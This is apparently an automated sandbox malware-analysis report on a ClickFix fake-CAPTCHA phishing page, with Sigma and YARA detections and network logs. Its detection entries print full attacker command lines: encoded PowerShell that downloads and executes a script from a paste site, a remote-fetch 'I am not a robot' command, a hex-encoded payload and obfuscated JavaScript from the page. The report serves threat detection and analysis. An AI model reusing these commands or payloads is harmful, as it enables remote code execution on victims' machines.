AQwBTAGgAYQByAHAAIAAoAEwAUwAgAFYAYQByAGkAYQBiAGwAZQA6AC8ARQBtAGkAKQAuAFYAYQBsAHUAZQA7ACgAWwBnAE0AVwBJAHAARQBIAE4AVgBpAF0AOgA6AEQAdgBnAHkAaQBKAHgAdQBUAHQAKAAoAEcAVgAgAEIARgAgAC0AVgBhAGwAdQBlAE8AbgBsACkAKQApAHwAJgAoAEcASQAgAEEAbABpAGEAcwA6AEkARQAqACkA , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 396, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qwzwa2hv.cmdline", ProcessId: 5944, ProcessName: csc.exe
      Sigma detected: Suspicious Execution of Powershell with Base64
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -ExecutionPolicy UnRestricted -Enc bABzACAAcABhAG4AeQBvACoAOwBTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEUAbQBpACAAJwBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAGcATQBXAEkAcABFAEgATgBWAGkAewBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABEAHYAZwB5AGkASgB4AHUAVAB0ACgAcwB0AHIAaQBuAGcAIAB1AHIAbAApAHsAcgBlAHQAdQByAG4AIAAoAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACgAKQApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAdQByAGwAKQA7AH0AfQAnADsAUwBlAHQALQBWAGEAcgBpAGEAYgBsAGUAIABCAEYAIAAnAGgAdAB0AHAAcwA6AC8ALwBuAG8AcABhAHMAdABlAC4AbgBlAHQALwBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAJwA7ACYAKABHAFYAIABFACoAdABlAHgAKgApAC4AVgBhAGwAdQBlAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQB8AEcATQApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQAuACgAKAAoAEcAVgAgAEUAKgB0AGUAeAAqACkALgBWAGEAbAB1AGUAfABHAE0AKQBbADYAXQAuAE4AYQBtAGUAKQAuAFAAcwBPAGIAagBlAGMAdAAuAE0AZQB0AGgAbwBkAHMAfABXAGgAZQByAGUALQBPAGIAagBlAGMAdAB7ACQAXwAuAE4AYQBtAGUALQBjAGwAaQBrAGUAJwBHACoAZAAnAH0AKQAuAE4AYQBtAGUAKQAuAEkAbgB2AG8AawBlACgAKABHAFYAIABFACoAdABlAHgAKgApAC4AVgBhAGwAdQBlAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQB8AEcATQApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQAuACgAKAAoAEcAVgAgAEUAKgB0AGUAeAAqACkALgBWAGEAbAB1AGUAfABHAE0AKQBbADYAXQAuAE4AYQBtAGUAKQB8AEcATQB8AFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0AHsAJABfAC4ATgBhAG0AZQAtAGMAbABpAGsAZQAnACoAbwBtACoAZQAnAH0AKQAuAE4AYQBtAGUAKQAuAEkAbgB2AG8AawBlACgAJwAqAC0AVAB5ACoAZQAnACwAMQAsADEAKQAsAFsATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBDAG8AbQBtAGEAbgBkAFQAeQBwAGUAcwBdADoAOgBDAG0AZABsAGUAdAApAC0ATABhACAAQwBTAGgAYQByAHAAIAAoAEwAUwAgAFYAYQByAGkAYQBiAGwAZQA6AC8ARQBtAGkAKQAuAFYAYQBsAHUAZQA7ACgAWwBnAE0AVwBJAHAARQBIAE4AVgBpAF0AOgA6AEQAdgBnAHkAaQBKAHgAdQBUAHQAKAAoAEcAVgAgAEIARgAgAC0AVgBhAGwAdQBlAE8AbgBsACkAKQApAHwAJgAoAEcASQAgAEEAbABpAGEAcwA6AEkARQAqACkA , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -ExecutionPolicy UnRestricted -Enc bABzACAAcABhAG4AeQBvACoAOwBTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEUAbQBpACAAJwBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAGcATQBXAEkAcABFAEgATgBWAGkAewBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABEAHYAZwB5AGkASgB4AHUAVAB0ACgAcwB0AHIAaQBuAGcAIAB1AHIAbAApAHsAcgBlAHQAdQByAG4AIAAoAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACgAKQApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAdQByAGwAKQA7AH0AfQAnADsAUwBlAHQALQBWAGEAcgBpAGEAYgBsAGUAIABCAEYAIAAnAGgAdAB0AHAAcwA6AC8ALwBuAG8AcABhAHMAdABlAC4AbgBlAHQALwBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAJwA7ACYAKABHAFYAIABFACoAdABlAHgAKgApAC4AVgBhAGwAdQBlAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQB8AEcATQApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQAuACgAKAAoAEcAVgAgAEUAKgB0AGUAeAAqACkALgBWAGEAbAB1AGUAfABHAE0AKQBbADYAXQAuAE4AYQBtAGUAKQAuAFAAcwBPAGIAagBlAGMAdAAuAE0AZQB0AGgAbwBkAHMAfABXAGgAZQByAGUALQBPAGIAagBlAGMAd
      Sigma detected: Dynamic CSharp Compile Artefact
      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 396, TargetFilename: C:\Users\user\AppData\Local\Temp\qwzwa2hv.cmdline
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" . \*i*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\*2\m??ta.??? https://yxyz.zyxy.org/MARBI.mp4?u=d4a7bb1a-1651-4566-9e40-7a8a87d785c1 # ? ''I am not a robot - reCAPTCHA Verification ID: 7126'', CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" . \*i*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\*2\m??ta.??? https://yxyz.zyxy.org/MARBI.mp4?u=d4a7bb1a-1651-4566-9e40-7a8a87d785c1 # ? ''I am not a robot - reCAPTCHA Verification ID: 7126'', CommandLine|base64offset|contains: j, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" . \*i*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\*2\m??ta.??? https://yxyz.zyxy.org/MARBI.mp4?u=d4a7bb1a-1651-4566-9e40-7a8a87d785c1 # ? ''I am not a robot - reCAPTCHA Verification ID: 7126'', ProcessId: 1952, ProcessName: powershell.exe
      Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function WXndL($cIxW){return -split ($cIxW -replace '..', '0x$& ')};$Ggxu = WXndL('7A5B64CCD96D57D64EFE4A812D2BC4BDE9AE1B1E7F65468F80EA3D5B60B7D7C15F2443A3E6237EAB1F9F3E91A5D835EB18A448CE892FC625BA5CB4E7734FA0B152E164A9AE08D0FEF9B18C700BA2C123C96722C862D347993D0AA1AF4AEEBDD9B33579FD0C0E3E8F4ED828B8EBE67830131A567BC4410ED3DE3DB182881AB06E5D1206E78F5AB5BC320CEB0CD1230E202D819C71580B2958CC5C0E8D1B8BD3370ED4F7231F1F5798BCD1F65460270B2E1E6ED59863C8B5F03F81A685BAD5E7B10E0FB9D1E708A9E5C024FA30DDC882FC492E0DF958455665B085A89C33E2271C0460170B1A544FCCC02AAD22554D5904FEDB87E26616ADC6815B78E3F211ECE66EE7D5818C58FD2367560D21420D5A870A96BF6813F16918FD2CAE995E81E5D5EEE764267ADB4E5F453DAC47D2AA762258E397C75CFF7333F5692FC5E25513BAC939EC2D35D580E47B773762AFA92B8C33B29E596DD3C52FB4B99790BC72803AD41F0A8088B6CBED15134D7A3795F91350D8363992E47BC33998786B02F2BC54DEADA79DA25CDD4E8456CDE732FF3D1BD51FFB619BBF4745E1D5B394630DE4C65145A4F40D54FC2FDFFF60DAC2370A34BE793B19A62E7BFB4C17185C1DC5324F37FFB32F313CB1BD87D5ED80FDE6998A2FA6EAE031759049B99236C74EBE0FCAA0366DFBD6D5203BB793793C30DD6C7711F139487A16F956DED2456E89DA6E8075E848518861F83E12FE6B6D9418FC30B86423F75566F6B84368C093B9C427A827CCA5508786A5C0C9C4FDC8098CF6F6387EF1B6779E7520FFA6CB54F1831F4AA87E12F048C0CF6F7626832EEACA8F18970723839BC8DF8E4A95B0792580CB979CFC7127742BFAC8575A87620516BE0330CEEEC026AE6DEF88079288ADA091993D6A1E4095B56E7A4972D51CC3305B770FFD659D6DF1A16842FAB38AB77C79C33863A3DDD3492894F183BE23A2F13E9B123C61AAA62EA17F6E370D5F5455BDCBE40447C979E2071A5E1C73DAB66505D5097B0CE259E3740A4D336C5D9D478B4BDD16372BC7EDFE1881DEA74E5B9CE7264F939FC71C1A404155682C546391908E072FABB77AFA55EF85CF8D463AF296CB5A97F75A04C27BB522CBD6647D3486CE6F1255A20C9F533CBB8E63861054920A4CAC251BCE2877D09D44209DF14F219EFB4C83461ED25DD05A3920BE2B123C394CC75C22C37A1CBE663656DBBC5E092E0B0019D2990501F5747EEBCB04B628410E9A300AEF287CFF0E6891F2F376C686F5FA861C85F88D563CE6DA2BAF185CC7C432FBC4291B50D6C71EC3AF86F793050E7DA9386849A66D23F884A8EBB084B1E52AFD97FC48ED50A9E6127344548B3E1D3FE46A9B700E23523933F2658A2E11359A7801DCFA20518A8C8ECFB897185694E264D854CE8307694F52B05B1F77A162CF1DD6266ACF5A7558C4494FF2E5B813EA6AA2F10A626FA53624CAEFB65B0BEBCCBCE907FC29AFF64D665F48576317019CB117E486DB9344CB12B5A4C8C99244F69A2C044F0C2B1E2C015323E6F2E9963937F86A2F610B470A787592B51B4A8A0AC1BEBCFBA6BDBBAE601BE25E9697ED1F1F6620B93F5E571C3E1A4F0E8C47093BF22DA12E6490B3AC878564D340B19F5614B1B063BD182E6D649D69AFD32FB57DDA451BB8764142FB0F42BE6E0189467BC1CB105D5FB522273E3782FDAA9E79D531A3BB879EA59043A20FED1EB60716386B9AAB98DC3EE64A1E470DA50DAC0026141747D5C0EED0044EC0D0915C02328F86F0BB7D373FB02861150AB1351E5702E10845E364532DF7DA550E8FADD43BC553C286B9362C8D94A1B01CBEED6A0696A644B4B1C4C07D01BE9FFFFE5E695FE16EEBAF8905BD570BE4B36D0F1C07D860553FBE42A1F44FEBF0A667E85D3544FE91FF701BE78DE167BB6758BB19538D1418D9B1403CFBD5C98DC579BAB71C1BA2BFB6A2ED52BC640E9E45881734D627572BBB24767BF9105E290AED4FD0A
      Sigma detected: Windows Processes Suspicious Parent Directory
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7100, ProcessName: svchost.exe

      Data Obfuscation

      barindex
      Sigma detected: Dot net compiler compiles file from suspicious location
      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qwzwa2hv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qwzwa2hv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -ExecutionPolicy UnRestricted -Enc bABzACAAcABhAG4AeQBvACoAOwBTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEUAbQBpACAAJwBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAGcATQBXAEkAcABFAEgATgBWAGkAewBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABEAHYAZwB5AGkASgB4AHUAVAB0ACgAcwB0AHIAaQBuAGcAIAB1AHIAbAApAHsAcgBlAHQAdQByAG4AIAAoAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACgAKQApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAdQByAGwAKQA7AH0AfQAnADsAUwBlAHQALQBWAGEAcgBpAGEAYgBsAGUAIABCAEYAIAAnAGgAdAB0AHAAcwA6AC8ALwBuAG8AcABhAHMAdABlAC4AbgBlAHQALwBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAJwA7ACYAKABHAFYAIABFACoAdABlAHgAKgApAC4AVgBhAGwAdQBlAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQB8AEcATQApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQAuACgAKAAoAEcAVgAgAEUAKgB0AGUAeAAqACkALgBWAGEAbAB1AGUAfABHAE0AKQBbADYAXQAuAE4AYQBtAGUAKQAuAFAAcwBPAGIAagBlAGMAdAAuAE0AZQB0AGgAbwBkAHMAfABXAGgAZQByAGUALQBPAGIAagBlAGMAdAB7ACQAXwAuAE4AYQBtAGUALQBjAGwAaQBrAGUAJwBHACoAZAAnAH0AKQAuAE4AYQBtAGUAKQAuAEkAbgB2AG8AawBlACgAKABHAFYAIABFACoAdABlAHgAKgApAC4AVgBhAGwAdQBlAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQB8AEcATQApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQAuACgAKAAoAEcAVgAgAEUAKgB0AGUAeAAqACkALgBWAGEAbAB1AGUAfABHAE0AKQBbADYAXQAuAE4AYQBtAGUAKQB8AEcATQB8AFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0AHsAJABfAC4ATgBhAG0AZQAtAGMAbABpAGsAZQAnACoAbwBtACoAZQAnAH0AKQAuAE4AYQBtAGUAKQAuAEkAbgB2AG8AawBlACgAJwAqAC0AVAB5ACoAZQAnACwAMQAsADEAKQAsAFsATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBDAG8AbQBtAGEAbgBkAFQAeQBwAGUAcwBdADoAOgBDAG0AZABsAGUAdAApAC0ATABhACAAQwBTAGgAYQByAHAAIAAoAEwAUwAgAFYAYQByAGkAYQBiAGwAZQA6AC8ARQBtAGkAKQAuAFYAYQBsAHUAZQA7ACgAWwBnAE0AVwBJAHAARQBIAE4AVgBpAF0AOgA6AEQAdgBnAHkAaQBKAHgAdQBUAHQAKAAoAEcAVgAgAEIARgAgAC0AVgBhAGwAdQBlAE8AbgBsACkAKQApAHwAJgAoAEcASQAgAEEAbABpAGEAcwA6AEkARQAqACkA , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 396, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qwzwa2hv.cmdline", ProcessId: 5944, ProcessName: csc.exe

      Suricata Signatures

      No Suricata rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      Yara detected CAPTCHA Scam ClickFix
      Source: Yara matchFile source: 1.1.pages.csv, type: HTML
      Source: Yara matchFile source: 1.2.pages.csv, type: HTML
      Source: https://annavirgili.com/HTTP Parser: Base64 decoded: const _0x27e5b9 = _0x4932;(function (_0x1cba6e, _0xe7489f) { const _0x4fe17f = _0x4932, _0x261214 = _0x1cba6e(); while (!![]) { try { const _0x31325 = parseInt(_0x4fe17f(0x180)) / (0x1df4 + 0x1d44 + -0x1e9 * 0x1f) * (parseInt(...
      Source: https://annavirgili.com/HTTP Parser: Script src: data:text/javascript;base64,Y29uc3QgXzB4MjdlNWI5ID0gXzB4NDkzMjsKKGZ1bmN0aW9uIChfMHgxY2JhNmUsIF8weGU3NDg5ZikgewogICAgY29uc3QgXzB4NGZlMTdmID0gXzB4NDkzMiwgXzB4MjYxMjE0ID0gXzB4MWNiYTZlKCk7CiAgICB3aGlsZSAoISFbXSkgewogICAgICAgIHRyeSB7CiAgICAgICAgICAgIGNvbn
      Source: https://annavirgili.com/HTTP Parser: Script src: data:text/javascript;base64,Y29uc3QgXzB4MjdlNWI5ID0gXzB4NDkzMjsKKGZ1bmN0aW9uIChfMHgxY2JhNmUsIF8weGU3NDg5ZikgewogICAgY29uc3QgXzB4NGZlMTdmID0gXzB4NDkzMiwgXzB4MjYxMjE0ID0gXzB4MWNiYTZlKCk7CiAgICB3aGlsZSAoISFbXSkgewogICAgICAgIHRyeSB7CiAgICAgICAgICAgIGNvbn
      Source: https://annavirgili.com/HTTP Parser: Script src: data:text/javascript;base64,Y29uc3QgXzB4MjdlNWI5ID0gXzB4NDkzMjsKKGZ1bmN0aW9uIChfMHgxY2JhNmUsIF8weGU3NDg5ZikgewogICAgY29uc3QgXzB4NGZlMTdmID0gXzB4NDkzMiwgXzB4MjYxMjE0ID0gXzB4MWNiYTZlKCk7CiAgICB3aGlsZSAoISFbXSkgewogICAgICAgIHRyeSB7CiAgICAgICAgICAgIGNvbn
      Source: https://annavirgili.com/HTTP Parser: Script src: data:text/javascript;base64,Y29uc3QgXzB4MjdlNWI5ID0gXzB4NDkzMjsKKGZ1bmN0aW9uIChfMHgxY2JhNmUsIF8weGU3NDg5ZikgewogICAgY29uc3QgXzB4NGZlMTdmID0gXzB4NDkzMiwgXzB4MjYxMjE0ID0gXzB4MWNiYTZlKCk7CiAgICB3aGlsZSAoISFbXSkgewogICAgICAgIHRyeSB7CiAgICAgICAgICAgIGNvbn
      Source: https://annavirgili.com/HTTP Parser: Script src: data:text/javascript;base64,Y29uc3QgXzB4MjdlNWI5ID0gXzB4NDkzMjsKKGZ1bmN0aW9uIChfMHgxY2JhNmUsIF8weGU3NDg5ZikgewogICAgY29uc3QgXzB4NGZlMTdmID0gXzB4NDkzMiwgXzB4MjYxMjE0ID0gXzB4MWNiYTZlKCk7CiAgICB3aGlsZSAoISFbXSkgewogICAgICAgIHRyeSB7CiAgICAgICAgICAgIGNvbn
      Source: https://annavirgili.com/HTTP Parser: Script src: data:text/javascript;base64,Y29uc3QgXzB4MjdlNWI5ID0gXzB4NDkzMjsKKGZ1bmN0aW9uIChfMHgxY2JhNmUsIF8weGU3NDg5ZikgewogICAgY29uc3QgXzB4NGZlMTdmID0gXzB4NDkzMiwgXzB4MjYxMjE0ID0gXzB4MWNiYTZlKCk7CiAgICB3aGlsZSAoISFbXSkgewogICAgICAgIHRyeSB7CiAgICAgICAgICAgIGNvbn
      Source: https://annavirgili.com/HTTP Parser: Iframe src: https://www.googletagmanager.com/ns.html?id=GTM-K268W3Z
      Source: https://annavirgili.com/HTTP Parser: Iframe src: https://www.googletagmanager.com/ns.html?id=GTM-K268W3Z
      Source: https://annavirgili.com/HTTP Parser: Iframe src: https://www.googletagmanager.com/ns.html?id=GTM-K268W3Z
      Source: https://annavirgili.com/HTTP Parser: Iframe src: https://www.googletagmanager.com/ns.html?id=GTM-K268W3Z
      Source: https://annavirgili.com/HTTP Parser: Iframe src: https://www.googletagmanager.com/ns.html?id=GTM-K268W3Z
      Source: https://annavirgili.com/HTTP Parser: Iframe src: https://www.googletagmanager.com/ns.html?id=GTM-K268W3Z
      Source: https://annavirgili.com/HTTP Parser: <input type="password" .../> found
      Source: https://annavirgili.com/HTTP Parser: No <meta name="author".. found
      Source: https://annavirgili.com/HTTP Parser: No <meta name="author".. found
      Source: https://annavirgili.com/HTTP Parser: No <meta name="author".. found
      Source: https://annavirgili.com/HTTP Parser: No <meta name="author".. found
      Source: https://annavirgili.com/HTTP Parser: No <meta name="author".. found
      Source: https://annavirgili.com/HTTP Parser: No <meta name="author".. found
      Source: https://annavirgili.com/HTTP Parser: No <meta name="copyright".. found
      Source: https://annavirgili.com/HTTP Parser: No <meta name="copyright".. found
      Source: https://annavirgili.com/HTTP Parser: No <meta name="copyright".. found
      Source: https://annavirgili.com/HTTP Parser: No <meta name="copyright".. found
      Source: https://annavirgili.com/HTTP Parser: No <meta name="copyright".. found
      Source: https://annavirgili.com/HTTP Parser: No <meta name="copyright".. found
      Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49698 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49699 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49709 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49889 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49890 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49894 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:49904 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49910 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49912 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49914 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49913 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49915 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.25.207:443 -> 192.168.2.16:50011 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.205.226:443 -> 192.168.2.16:50025 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 174.138.125.138:443 -> 192.168.2.16:50028 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.205.226:443 -> 192.168.2.16:50033 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.189.78:443 -> 192.168.2.16:50036 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.189.78:443 -> 192.168.2.16:50037 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.189.78:443 -> 192.168.2.16:50039 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.189.78:443 -> 192.168.2.16:50040 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.189.78:443 -> 192.168.2.16:50041 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.189.78:443 -> 192.168.2.16:50042 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.189.78:443 -> 192.168.2.16:50043 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.189.78:443 -> 192.168.2.16:50044 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.189.78:443 -> 192.168.2.16:50045 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.16:50046 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.26.127:443 -> 192.168.2.16:50047 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.68.188:443 -> 192.168.2.16:50049 version: TLS 1.2
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData

      Networking

      barindex
      Connects to a pastebin service (likely for C&C)
      Source: unknownDNS query: name: pastebin.com
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
